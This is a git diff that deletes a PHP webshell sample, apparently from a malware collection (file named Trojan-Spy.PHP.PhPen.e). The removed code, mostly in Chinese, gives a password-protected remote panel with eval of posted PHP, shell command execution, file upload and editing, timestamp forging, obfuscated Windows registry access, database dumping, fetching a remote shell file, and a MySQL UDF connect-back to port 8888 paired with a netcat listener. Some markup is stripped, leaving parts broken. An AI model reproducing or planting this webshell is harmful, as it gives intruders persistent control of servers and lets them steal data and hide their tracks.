diff --git a/PHP/Trojan-Spy.PHP.PhPen.e b/PHP/Trojan-Spy.PHP.PhPen.e deleted file mode 100644 index af96b3ca..00000000 --- a/PHP/Trojan-Spy.PHP.PhPen.e +++ /dev/null @@ -1,1440 +0,0 @@ -Http://www.51shell.cn[s4t]"; -/*===================== 配置结束 =====================*/ -// 允许程序在 register_globals = off 的环境下工作 -$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); - -if ($onoff != 1) { - @extract($_POST, EXTR_SKIP); - @extract($_GET, EXTR_SKIP); -} - -$self = $_SERVER['PHP_SELF']; -$dis_func = get_cfg_var("disable_functions"); - - -/*===================== 身份验证 =====================*/ -if($admin['check'] == "1") { - if ($_GET['action'] == "logout") { - setcookie ("adminpass", ""); - echo ""; - echo "注销成功......

三秒后自动退出或单击这里退出程序界面 >>>"; - exit; - } - - if ($_POST['do'] == 'login') { - $thepass=trim($_POST['adminpass']); - if ($admin['pass'] == $thepass) { - setcookie ("adminpass",$thepass,time()+(1*24*3600)); - echo ""; - echo "登陆成功......

三秒后自动跳转或单击这里进入程序界面 >>>"; - exit; - } - } - if (isset($_COOKIE['adminpass'])) { - if ($_COOKIE['adminpass'] != $admin['pass']) { - loginpage(); - } - } else { - loginpage(); - } -} -/*===================== 验证结束 =====================*/ - -// 判断 magic_quotes_gpc 状态 -if (get_magic_quotes_gpc()) { - $_GET = stripslashes_array($_GET); - $_POST = stripslashes_array($_POST); -} - -// 查看PHPINFO -if ($_GET['action'] == "phpinfo") { - echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>"; - exit; -} -if($_GET['action'] == "nowuser") { -$user = get_current_user(); -if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; -echo"当前进程用户名:$user"; -exit; -} -if(isset($_POST['phpcode'])){ - eval("?".">$_POST[phpcode]


获取 URL 内容失败

"; - exit; -} - -// 下载文件 -if (!empty($downfile)) { - if (!@file_exists($downfile)) { - echo ""; - } else { - $filename = basename($downfile); - $filename_info = explode('.', $filename); - $fileext = $filename_info[count($filename_info)-1]; - header('Content-type: application/x-'.$fileext); - header('Content-Disposition: attachment; filename='.$filename); - header('Content-Description: PHP Generated Data'); - header('Content-Length: '.filesize($downfile)); - @readfile($downfile); - exit; - } -} - -// 直接下载备份数据库 -if ($_POST['backuptype'] == 'download') { - @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); - @mysql_select_db($dbname) or die("选择数据库失败"); - $table = array_flip($_POST['table']); - $result = mysql_query("SHOW tables"); - echo ($result) ? NULL : "出错: ".mysql_error(); - - $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); - header('Content-type: application/unknown'); - header('Content-Disposition: attachment; filename='.$filename); - $mysqldata = ''; - while ($currow = mysql_fetch_array($result)) { - if (isset($table[$currow[0]])) { - $mysqldata.= sqldumptable($currow[0]); - $mysqldata.= $mysqldata."\r\n"; - } - } - mysql_close(); - exit; -} - -// 程序目录 -$pathname=str_replace('\\','/',dirname(__FILE__)); - -// 获取当前路径 -if (!isset($dir) or empty($dir)) { - $dir = "."; - $nowpath = getPath($pathname, $dir); -} else { - $dir=$_GET['dir']; - $nowpath = getPath($pathname, $dir); -} - -// 判断读写情况 -$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; -$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; -$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; - -$tb = new FORMS; - -?> - - - -sai's webshell - - - - -
-tableheader(); -$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Y年m月d日 h:i:s",time()).''.$_SERVER['REMOTE_ADDR'].'
','center','top'); -$tb->tdbody('注销 | shell目录 | 环境变量 | 代理'.$reg.$phpinfo.' | WebShell | downloads | Search | Eval | SQL Query | Fun |MySQL Backup'); -$tb->tablefooter(); -?> -
- -headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); - -$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); - -$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); - -$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); -?> -

-
-\n"; -// 删除文件 -if (!empty($delfile)) { - if (file_exists($delfile)) { - echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; - } else { - echo basename($delfile)." 文件已不存在!"; - } -} - -// 删除目录 -elseif (!empty($deldir)) { - $deldirs="$dir/$deldir"; - if (!file_exists("$deldirs")) { - echo "$deldir 目录已不存在!"; - } else { - echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; - } -} - -// 创建目录 -elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { - if (!empty($newdirectory)) { - $mkdirs="$dir/$newdirectory"; - if (file_exists("$mkdirs")) { - echo "该目录已存在!"; - } else { - echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; - @chmod("$mkdirs",0777); - } - } -} - -// 上传文件 -elseif ($doupfile) { - echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; -} - -// 编辑文件 -elseif ($_POST['do'] == 'doeditfile') { - if (!empty($_POST['editfilename'])) { - if(!file_exists($editfilename)) unset($retime); - if($time==$now) $time = @filemtime($editfilename); - $time2 = @date("Y-m-d H:i:s",$time); - $filename="$editfilename"; - @$fp=fopen("$filename","w"); - if($_POST['change']=="yes"){ - $filecontent = "?".">".$_POST['filecontent'].""; - }else{ - $filecontent = $_POST['filecontent']; - } - echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!"; - @fclose($fp); - if($retime=="yes"){ - echo" 鱼鱼自动操作:"; - echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!"; - } - } else { - echo "请输入想要编辑的文件名!"; - } -} -//文件下载 -elseif ($_POST['do'] == 'downloads') { - $contents = @file_get_contents($_POST['durl']); - if(!$contents){ - echo"无法读取要下载的数据"; - } - elseif(file_exists($path)){ - echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。"; - }else{ - $fp = @fopen($path,"w"); - echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!"; - @fclose($fp); - } -} - -// 编辑文件属性 -elseif ($_POST['do'] == 'editfileperm') { - if (!empty($_POST['fileperm'])) { - $fileperm=base_convert($_POST['fileperm'],8,10); - echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!"; - echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); - } else { - echo "请输入想要设置的属性!"; - } -} - -// 文件改名 -elseif ($_POST['do'] == 'rename') { - if (!empty($_POST['newname'])) { - $newname=$_POST['dir']."/".$_POST['newname']; - if (@file_exists($newname)) { - echo "".$_POST['newname']." 已经存在,请重新输入一个!"; - } else { - echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!"; - } - } else { - echo "请输入想要改的文件名!"; - } -} -elseif ($_POST['do'] == 'search') { -if(!empty($oldkey)){ -echo"查找关键词:[".$oldkey."],下面显示查找的结果:"; - if($type2 == "getpath"){ - echo"鼠标移到结果文件上会有部分截取显示."; -} -echo"
"; -find($path); -}else{ -echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; -} -} - -// 克隆时间 -elseif ($_POST['do'] == 'domodtime') { - if (!@file_exists($_POST['curfile'])) { - echo "要修改的文件不存在!"; - } else { - if (!@file_exists($_POST['tarfile'])) { - echo "要参照的文件不存在!"; - } else { - $time=@filemtime($_POST['tarfile']); - echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; - } - } -} - -// 自定义时间 -elseif ($_POST['do'] == 'modmytime') { - if (!@file_exists($_POST['curfile'])) { - echo "要修改的文件不存在!"; - } else { - $year=$_POST['year']; - $month=$_POST['month']; - $data=$_POST['data']; - $hour=$_POST['hour']; - $minute=$_POST['minute']; - $second=$_POST['second']; - if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { - $time=strtotime("$data $month $year $hour:$minute:$second"); - echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; - } - } -} - -// 连接MYSQL -elseif ($connect) { - if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { - echo "数据库连接成功!"; - mysql_close(); - } else { - echo mysql_error(); - } -} - -// 执行SQL语句 -elseif ($_POST['do'] == 'query') { - @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); - @mysql_select_db($dbname) or die("选择数据库失败"); - $result = @mysql_query($_POST['sql_query']); - echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error(); - mysql_close(); -} - -// 备份操作 -elseif ($_POST['do'] == 'backupmysql') { - if (empty($_POST['table']) OR empty($_POST['backuptype'])) { - echo "请选择欲备份的数据表和备份方式!"; - } else { - if ($_POST['backuptype'] == 'server') { - @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); - @mysql_select_db($dbname) or die("选择数据库失败"); - $table = array_flip($_POST['table']); - $filehandle = @fopen($path,"w"); - if ($filehandle) { - $result = mysql_query("SHOW tables"); - echo ($result) ? NULL : "出错: ".mysql_error(); - while ($currow = mysql_fetch_array($result)) { - if (isset($table[$currow[0]])) { - sqldumptable($currow[0], $filehandle); - fwrite($filehandle,"\n\n\n"); - } - } - fclose($filehandle); - echo "数据库已成功备份到 ".$path.""; - mysql_close(); - } else { - echo "备份失败,请确认目标文件夹是否具有可写权限!"; - } - } - } -} - -// 打包下载 PS:文件太大可能非常慢 -// Thx : 小花 -elseif($downrar) { - if (!empty($dl)) { - $dfiles=""; - foreach ($dl AS $filepath=>$value) { - $dfiles.=$filepath.","; - } - $dfiles=substr($dfiles,0,strlen($dfiles)-1); - $dl=explode(",",$dfiles); - $zip=new PHPZip($dl); - $code=$zip->out; - header("Content-type: application/octet-stream"); - header("Accept-Ranges: bytes"); - header("Accept-Length: ".strlen($code)); - header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz"); - echo $code; - exit; - } else { - echo "请选择要打包下载的文件!"; - } -} - -// Shell.Application 运行程序 -elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { - $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); - $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); - echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!"; -} - -// 查看PHP配置参数状况 -elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { - echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; -} - -// 读取注册表 -elseif(($regread) AND !empty($_POST['readregname'])) { - $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); - var_dump(@$shell->RegRead($_POST['readregname'])); -} - -// 写入注册表 -elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { - $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); - $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); - echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!"; -} - -// 删除注册表 -elseif(($regdelete) AND !empty($_POST['delregname'])) { - $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); - $a = @$shell->RegDelete($_POST['delregname']); - echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!"; -} - -else { - echo "$notice"; -} - -echo "

\n"; -/*===================== 执行操作 结束 =====================*/ - -if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { - $tb->tableheader(); -?> - - 文件 - 创建日期 - 最后修改 - 大小 - 属性 - 操作 - -\n"; - echo " [$file]\n"; - echo " $ctime\n"; - echo " $mtime\n"; - echo " <dir>\n"; - echo " $dirperm\n"; - echo " | 删除 | 改名 |\n"; - echo "\n"; - $dir_i++; - } else { - if($file=="..") { - echo "\n"; - echo " 返回上级目录\n"; - echo "\n"; - } - } - } -}// while -@closedir($dirs); -?> - - - -
-".@date("Y-m-d H:i:s",@filectime($filepath)).""; - $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; - } - @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); - echo "\n"; - echo " "; - echo ""; - echo "$file\n"; - echo " $ctime\n"; - echo " $mtime\n"; - echo " $size KB\n"; - echo " $fileperm\n"; - echo " 下载 | 编辑 | 删除 | 改名 | 时间\n"; - echo "\n"; - $file_i++; - } -}// while -@closedir($dirs); -$tb->tdbody('
'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','选中文件打包下载','','submit').''.$dir_i.' 个目录 / '.$file_i.' 个文件
','center',getrowbg(),'','','6'); - -echo "
\n"; -echo "\n"; -}// end dir - -elseif ($_GET['action'] == "editfile") { - if(empty($newfile)) { - $filename="$dir/$editfile"; - $fp=@fopen($filename,"r"); - $contents=@fread($fp, filesize($filename)); - @fclose($fp); - $contents=htmlspecialchars($contents); - }else{ - $editfile=$newfile; - $filename = "$dir/$editfile"; - } - $action = "?dir=".urlencode($dir)."&editfile=".$editfile; - $tb->tableheader(); - $tb->formheader($action,'新建/编辑文件'); - $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: '); - $tb->tdbody($tb->maketextarea('filecontent',$contents)); - $tb->makehidden('do','doeditfile'); - $tb->formfooter('1','30'); -}//end editfile - -elseif ($_GET['action'] == "rename") { - $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); - $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); - $tb->tableheader(); - $tb->formheader($action,'修改文件名'); - $tb->makehidden('oldname',$dir."/".$nowfile); - $tb->makehidden('dir',$dir); - $tb->tdbody('当前文件名: '.basename($nowfile)); - $tb->tdbody('改名为: '.$tb->makeinput('newname')); - $tb->makehidden('do','rename'); - $tb->formfooter('1','30'); -}//end rename - -elseif ($_GET['action'] == "eval") { - $action = "?dir=".urlencode($dir).""; - $tb->tableheader(); - $tb->formheader(''.$action.' "target="_blank' ,'执行php脚本'); - $tb->tdbody($tb->maketextarea('phpcode',$contents)); - $tb->formfooter('1','30'); -} -elseif ($_GET['action'] == "fileperm") { - $action = "?dir=".urlencode($dir)."&file=".$file; - $tb->tableheader(); - $tb->formheader($action,'修改文件属性'); - $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); - $tb->makehidden('file',$file); - $tb->makehidden('dir',urlencode($dir)); - $tb->makehidden('do','editfileperm'); - $tb->formfooter('1','30'); -}//end fileperm - -elseif ($_GET['action'] == "newtime") { - $action = "?dir=".urlencode($dir); - $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); - $tb->tableheader(); - $tb->formheader($action,'克隆文件最后修改时间'); - $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30'); - $tb->makehidden('do','domodtime'); - $tb->formfooter('','30'); - $tb->formheader($action,'自定义文件最后修改时间'); - $tb->tdbody('
','left'); - $tb->tdbody('当前文件名: '.$file); - $tb->makehidden('curfile',$file); - $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30'); - $tb->makehidden('do','modmytime'); - $tb->formfooter('1','30'); -}//end newtime - -elseif ($_GET['action'] == "shell") { - $action = "??action=shell&dir=".urlencode($dir); - $tb->tableheader(); - $tb->tdheader('WebShell Mode'); - if (substr(PHP_OS, 0, 3) == 'WIN') { - $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; - $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; - echo "
\n"; - $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); - $tb->makehidden('do','programrun'); - echo "
\n"; - } - echo "
\n"; - if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; - $tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. '); - $tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.'); - $tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)'); - $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); - $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); -?> - - - -
- -tableheader(); - $tb->formheader($action,'读取注册表'); - $tb->tdbody('键值: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','读取','','submit'),'center','2','50'); - echo ""; - - $tb->formheader($action,'写入注册表'); - $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); - $tb->tdbody('键值: '.$tb->makeinput('writeregname',$registre,'','text','56').' 类型: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 值: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','写入','','submit'),'center','2','50'); - echo ""; - - $tb->formheader($action,'删除注册表'); - $tb->tdbody('键值: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','删除','','submit'),'center','2','50'); - echo ""; - $tb->tablefooter(); -}//end reg -elseif ($_GET['action'] == "downloads"){ -$action = '?action=dir'; - $tb->tableheader(); - $tb->formheader($action,'http文件下载模式'); - $tb->tdbody('你可以使用本功能把一些小工具以http方式下载到此服务器','center'); - $tb->tdbody('文件位置: '.$tb->makeinput('durl','http://blog.blackwoods.com/miyabi/myshell.txt','','text','70').'
下载到:'.$tb->makeinput('path','./myshell.php','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','下载','','submit'),'center','1','35'); - echo ""; - $tb->tdbody('注意,假设文件太大将无法下载下来而且影响执行速度.','center'); - $tb->tablefooter(); -} -elseif ($_GET['action'] == "search"){ -$action = '?dir='.$dir.''; - $tb->tableheader(); - $tb->formheader($action,'文件查找'); - $tb->tdbody('你可以使用本功能查找一个目录下的文件里哪写文件包含着关键词!','center'); - $tb->tdbody('文件位置: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'
查找文字:'.$tb->makeinput('oldkey','下贱','','text','60').''.$tb->makehidden('do','search').'
是否计算所在行 (此功能和下面一个功能会影响执行速度,所以默认关闭!)
适当读取: 读取关键词前'.$tb->makeinput('beline','0','','text','3').'个字符 '.$tb->makehidden('dir',''.$dir.'').'到关键词后第'.$tb->makeinput('endline','10','','text','3').'个字符... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','开始查找文件','','submit'),'center','1','35'); - echo ""; - $tb->tdbody('请表太大的目录了,慢慢浏览慢慢找好不好嘛.假设选定计算行速度会慢。显示[所在行/总共多少行]','center'); - $tb->tablefooter(); -} -elseif ($_GET['action'] == "proxy") { - $action = '?action=proxy'; - $tb->tableheader(); - $tb->formheader($action,'在线代理','proxyframe'); - $tb->tdbody('
','left'); - $tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','浏览','','submit'),'center','1','40'); - $tb->tdbody(''); - echo ""; - $tb->tablefooter(); -}//end proxy - -elseif ($_GET['action'] == "sql") { - $action = '?action=sql'; - - $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; - $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; - $dbpassword = $_POST['dbpassword']; - $dbname = $_POST['dbname']; - $sql_query = $_POST['sql_query']; -if($type=="fun"){ -$sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\Winnt\\Mix.dll'; -select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*这个最好先执行了上面一句再用*/ -/*请在你计算机上执行 nc -vv -l -p 8888*/"; -} - $tb->tableheader(); - $tb->formheader($action,'执行 SQL 语句'); - $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit')); - $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); - $tb->makehidden('do','query'); - $tb->formfooter('1','30'); -}//end sql query - -elseif ($_GET['action'] == "sqlbak") { - $action = '?action=sqlbak'; - $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; - $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; - $dbpassword = $_POST['dbpassword']; - $dbname = $_POST['dbname']; - $tb->tableheader(); - $tb->formheader($action,'备份 MySQL 数据库'); - $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit')); - @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); - $tables = @mysql_list_tables($dbname); - while ($table = @mysql_fetch_row($tables)) { - $cachetables[$table[0]] = $table[0]; - } - @mysql_free_result($tables); - if (empty($cachetables)) { - $tb->tdbody('您没有连接数据库 or 当前数据库没有任何数据表'); - } else { - $tb->tdbody('
请选择表:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
备份数据所保存的路径:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
直接下载到本地 (适合数据量较小的数据库)
'); - $tb->makehidden('do','backupmysql'); - $tb->formfooter('0','30'); - } - $tb->tablefooter(); - @mysql_close(); -}//end sql backup - -elseif ($_GET['action'] == "phpenv") { - $user = " 以免crush点此获取当前进程用户名 "; - $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; - $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; - if ($dis_func == "") { - $dis_func = "No"; - }else { - $dis_func = str_replace(" ","
",$dis_func); - $dis_func = str_replace(",","
",$dis_func); - } - $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; - $info = array( - 0 => array("当前php进程用户",$user), - 1 => array("服务器操作系统",PHP_OS), - 2 => array("服务器时间",date("Y年m月d日 h:i:s",time())), - 3 => array("服务器域名","".$_SERVER['SERVER_NAME'].""), - 4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), - 5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), - 6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), - 7 => array("Web服务端口",$_SERVER['SERVER_PORT']), - 8 => array("PHP运行方式",strtoupper(php_sapi_name())), - 9 => array("PHP版本",PHP_VERSION), - 10 => array("运行于安全模式",getphpcfg("safemode")), - 11 => array("服务器管理员",$adminmail), - 12 => array("本文件路径",__FILE__), - 13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")), - 14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")), - 15 => array("显示错误信息 display_errors",getphpcfg("display_errors")), - 16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")), - 17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), - 18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")), - 19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")), - 20 => array("允许最大上传文件 upload_max_filesize",$upsize), - 21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"), - 22 => array("被禁用的函数 disable_functions",$dis_func), - 23 => array("phpinfo()",$phpinfo), - 24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), - 25 => array("图形处理 GD Library",getfun("imageline")), - 26 => array("IMAP电子邮件系统",getfun("imap_close")), - 27 => array("MySQL数据库",getfun("mysql_close")), - 28 => array("SyBase数据库",getfun("sybase_close")), - 29 => array("Oracle数据库",getfun("ora_close")), - 30 => array("Oracle 8 数据库",getfun("OCILogOff")), - 31 => array("PREL相容语法 PCRE",getfun("preg_match")), - 32 => array("PDF文档支持",getfun("pdf_close")), - 33 => array("Postgre SQL数据库",getfun("pg_close")), - 34 => array("SNMP网络管理协议",getfun("snmpget")), - 35 => array("压缩文件支持(Zlib)",getfun("gzclose")), - 36 => array("XML解析",getfun("xml_set_object")), - 37 => array("FTP",getfun("ftp_login")), - 38 => array("ODBC数据库连接",getfun("odbc_close")), - 39 => array("Session支持",getfun("session_start")), - 40 => array("Socket支持",getfun("fsockopen")), - ); - $tb->tableheader(); - echo "
\n"; - $tb->tdbody('查看PHP配置参数状况','left','1','30','style="padding-left: 5px;"'); - $tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"'); - $tb->makehidden('do','viewphpvar'); - echo "
\n"; - $hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况'); - for ($a=0;$a<3;$a++) { - $tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"'); -?> - - - -\n"; - } - } elseif ($a == 1) { - for ($i=13;$i<=24;$i++) { - echo "\n"; - } - } elseif ($a == 2) { - for ($i=25;$i<=40;$i++) { - echo "\n"; - } - } -?> -
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
- - -"; -}//end phpenv -?> -
- - - - - -
Copyright (C) 2005 Sai All Rights Reserved.
-
- - - - - -
-Password: - - -
-read()) { - if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { - @chmod("$deldir/$file",0777); - deltree("$deldir/$file"); - } - if (is_file("$deldir/$file")) { - @chmod("$deldir/$file",0777); - @unlink("$deldir/$file"); - } - } - $mydir->close(); - @chmod("$deldir",0777); - return (@rmdir($deldir)) ? 1 : 0; - } - - // 判断读写情况 - function dir_writeable($dir) { - if (!is_dir($dir)) { - @mkdir($dir, 0777); - } - if(is_dir($dir)) { - if ($fp = @fopen("$dir/test.txt", 'w')) { - @fclose($fp); - @unlink("$dir/test.txt"); - $writeable = 1; - } else { - $writeable = 0; - } - } - return $writeable; - } - - // 表格行间的背景色替换 - function getrowbg() { - global $bgcounter; - if ($bgcounter++%2==0) { - return "firstalt"; - } else { - return "secondalt"; - } - } - - // 获取当前的文件系统路径 - function getPath($mainpath, $relativepath) { - global $dir; - $mainpath_info = explode('/', $mainpath); - $relativepath_info = explode('/', $relativepath); - $relativepath_info_count = count($relativepath_info); - for ($i=0; $i<$relativepath_info_count; $i++) { - if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; - if ($relativepath_info[$i] == '..') { - $mainpath_info_count = count($mainpath_info); - unset($mainpath_info[$mainpath_info_count-1]); - continue; - } - $mainpath_info[count($mainpath_info)] = 